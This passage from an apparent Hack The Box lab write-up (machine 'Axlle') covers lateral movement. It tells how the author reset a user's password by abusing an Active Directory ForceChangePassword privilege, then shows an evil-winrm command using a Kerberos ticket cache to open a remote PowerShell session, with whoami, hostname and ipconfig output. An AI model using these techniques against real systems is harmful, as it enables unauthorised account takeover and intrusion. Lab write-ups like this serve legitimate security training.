baz.humphries
In the earlier stage, I was able to reset the password of the baz.humphries user by leveraging the ForceChangePassword privilege as the dallon.matrix user. It was then validated.
The baz.humphries user is part of the Remote Management Users group.
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ KRB5CCNAME=baz.humphries@mainframe.axlle.htb.ccache evil-winrm -i mainframe.axlle.htb -r AXLLE.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> whoami
axlle\baz.humphries
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> hostname
MAINFRAME
*Evil-WinRM* PS C:\Users\baz.humphries\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::133
IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
IPv4 Address. . . . . . . . . . . : 10.10.11.21
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
10.10.10.2Lateral Movement made to the target system as the baz.humphries user via evil-winrm